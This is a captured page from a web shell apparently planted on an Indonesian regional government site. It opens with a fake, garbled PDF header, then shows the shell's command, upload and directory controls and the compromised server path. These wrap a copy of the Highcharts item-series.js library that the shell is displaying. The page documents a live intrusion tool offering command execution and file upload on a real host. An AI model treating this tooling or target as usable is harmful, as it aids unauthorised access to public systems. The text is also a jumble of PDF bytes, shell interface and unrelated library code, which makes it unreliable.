%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /www/wwwroot/jdih.dprd.mukomukokab.go.id/assets/49301cb8/es5/modules/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /www/wwwroot/jdih.dprd.mukomukokab.go.id/assets/49301cb8/es5/modules/item-series.js
/*
 Highcharts JS v10.3.3 (2023-01-20)

 Item series type for Highcharts

 (c) 2019 Torstein Honsi

 License: www.highcharts.com/license
*/
(function(a){"object"===typeof module&&module.exports?(a["default"]=a,module.exports=a):"function"===typeof define&&define.amd?define("highcharts/modules/item-series",["highcharts"],function(b){a(b);a.Highcharts=b;return a}):a("undefined"!==typeof Highcharts?Highcharts:void 0)})(function(a){function b(a,f,c,b){a.hasOwnProperty(f)||(a[f]=b.apply(null,c),"function"===typeof CustomEvent&&window.dispatchEvent(new CustomEvent("HighchartsModuleLoaded",{detail:{path:f,module:a[f]}})))}a=a?a._modules:{};
b(a,"Series/Item/ItemPoint.js",[a["Core/Series/SeriesRegistry.js"],a["Core/Utilities.js"]],function(a,f){var c=this&&this.__extends||function(){var a=function(b,d){a=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(a,d){a.__proto__=d}||function(a,d){for(var b in d)Object.prototype.hasOwnProperty.call(d,b)&&(a[b]=d[b])};return a(b,d)};return function(b,d){function f(){this.constructor=b}if("function"!==typeof d&&null!==d)throw new TypeError("Class extends value "+String(d)+" is not a constructor or null");
a(b,d);b.prototype=null===d?Object.create(d):(f.prototype=d.prototype,new f)}}(),b=a.series;f=f.extend;a=function(a){function b(){var b=null!==a&&a.apply(this,arguments)||this;b.options=void 0;b.series=void 0;return b}c(b,a);return b}(a.seriesTypes.pie.prototype.pointClass);f(a.prototype,{haloPath:b.prototype.pointClass.prototype.haloPath});return a});b(a,"Series/Item/ItemSeries.js",[a["Core/Globals.js"],a["Series/Item/ItemPoint.js"],a["Core/Defaults.js"],a["Core/Series/SeriesRegistry.js"],a["Core/Utilities.js"]],
function(a,b,c,x,h){var f=this&&this.__extends||function(){var a=function(b,e){a=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(a,e){a.__proto__=e}||function(a,e){for(var b in e)Object.prototype.hasOwnProperty.call(e,b)&&(a[b]=e[b])};return a(b,e)};return function(b,e){function d(){this.constructor=b}if("function"!==typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");a(b,e);b.prototype=null===e?Object.create(e):(d.prototype=e.prototype,
new d)}}(),d=c.defaultOptions,y=x.seriesTypes.pie,E=h.defined,z=h.extend,J=h.fireEvent,q=h.isNumber,A=h.merge,K=h.pick;c=function(b){function c(){var a=null!==b&&b.apply(this,arguments)||this;a.data=void 0;a.options=void 0;a.points=void 0;return a}f(c,b);c.prototype.animate=function(a){a?this.group.attr({opacity:0}):this.group.animate({opacity:1},this.options.animation)};c.prototype.drawDataLabels=function(){this.center&&this.slots?a.seriesTypes.pie.prototype.drawDataLabels.call(this):this.points.forEach(function(a){a.destroyElements({dataLabel:1})})};
c.prototype.drawPoints=function(){var a=this,b=this.options,c=a.chart.renderer,d=b.marker,f=this.borderWidth%2?.5:1,B=0,t=this.getRows(),h=Math.ceil(this.total/t),u=this.chart.plotWidth/h,v=this.chart.plotHeight/t,w=this.itemSize||Math.min(u,v);this.points.forEach(function(e){var n,F,l=e.marker||{},p=l.symbol||d.symbol;l=K(l.radius,d.radius);var H=E(l)?2*l:w,r=H*b.itemPadding,I;e.graphics=n=e.graphics||[];a.chart.styledMode||(F=a.pointAttribs(e,e.selected&&"select"));if(!e.isNull&&e.visible){e.graphic||
(e.graphic=c.g("point").add(a.group));for(var m=0;m<(e.y||0);m++){if(a.center&&a.slots){var g=a.slots.shift();var k=g.x-w/2;g=g.y-w/2}else"horizontal"===b.layout?(k=B%h*u,g=v*Math.floor(B/h)):(k=u*Math.floor(B/t),g=B%t*v);k+=r;g+=r;var q=I=Math.round(H-2*r);a.options.crisp&&(k=Math.round(k)-f,g=Math.round(g)+f);k={x:k,y:g,width:I,height:q};"undefined"!==typeof l&&(k.r=l);(g=n[m])?g.animate(k):(F&&z(k,F),g=c.symbol(p,void 0,void 0,void 0,void 0,{backgroundSize:"within"}).attr(k).add(e.graphic));g.isActive=
!0;n[m]=g;B++}}n.forEach(function(a,b){a&&(a.isActive?a.isActive=!1:(a.destroy(),n.splice(b,1)))})})};c.prototype.getRows=function(){var a=this.options.rows;if(!a){var b=this.chart.plotWidth/this.chart.plotHeight;a=Math.sqrt(this.total);if(1<b)for(a=Math.ceil(a);0<a;){var c=this.total/a;if(c/a>b)break;a--}else for(a=Math.floor(a);a<this.total;){c=this.total/a;if(c/a<b)break;a++}}return a};c.prototype.getSlots=function(){function a(a){0<D&&(a.row.colCount--,D--)}for(var b=this.center,c=b[2],d=b[3],
f,h=this.slots,t,q,u,v,w,x,n,C,l=0,p,G=this.endAngleRad-this.startAngleRad,r=Number.MAX_VALUE,y,m,g,k=this.options.rows,z=(c-d)/c,A=0===G%(2*Math.PI),E=this.total||0;r>E+(m&&A?m.length:0);)for(y=r,r=h.length=0,m=g,g=[],l++,p=c/l/2,k?(d=(p-k)/p*c,0<=d?p=k:(d=0,z=1)):p=Math.floor(p*z),f=p;0<f;f--)u=(d+f/p*(c-d-l))/2,v=G*u,w=Math.ceil(v/l),g.push({rowRadius:u,rowLength:v,colCount:w}),r+=w+1;if(m){for(var D=y-this.total-(A?m.length:0);0<D;)m.map(function(a){return{angle:a.colCount/a.rowLength,row:a}}).sort(function(a,
b){return b.angle-a.angle}).slice(0,Math.min(D,Math.ceil(m.length/2))).forEach(a);m.forEach(function(a){var c=a.rowRadius;x=(a=a.colCount)?G/a:0;for(C=0;C<=a;C+=1)n=this.startAngleRad+C*x,t=b[0]+Math.cos(n)*c,q=b[1]+Math.sin(n)*c,h.push({x:t,y:q,angle:n})},this);h.sort(function(a,b){return a.angle-b.angle});this.itemSize=l;return h}};c.prototype.translate=function(b){0===this.total&&q(this.options.startAngle)&&q(this.options.endAngle)&&(this.center=this.getCenter());this.slots||(this.slots=[]);q(this.options.startAngle)&&
q(this.options.endAngle)?(a.seriesTypes.pie.prototype.translate.apply(this,arguments),this.slots=this.getSlots()):(this.generatePoints(),J(this,"afterTranslate"))};c.defaultOptions=A(y.defaultOptions,{endAngle:void 0,innerSize:"40%",itemPadding:.1,layout:"vertical",marker:A(d.plotOptions.line.marker,{radius:null}),rows:void 0,crisp:!1,showInLegend:!0,startAngle:void 0});return c}(y);z(c.prototype,{markerAttribs:void 0});c.prototype.pointClass=b;x.registerSeriesType("item",c);"";return c});b(a,"masters/modules/item-series.src.js",
[],function(){})});
//# sourceMappingURL=item-series.js.map

Kontol Shell Bypass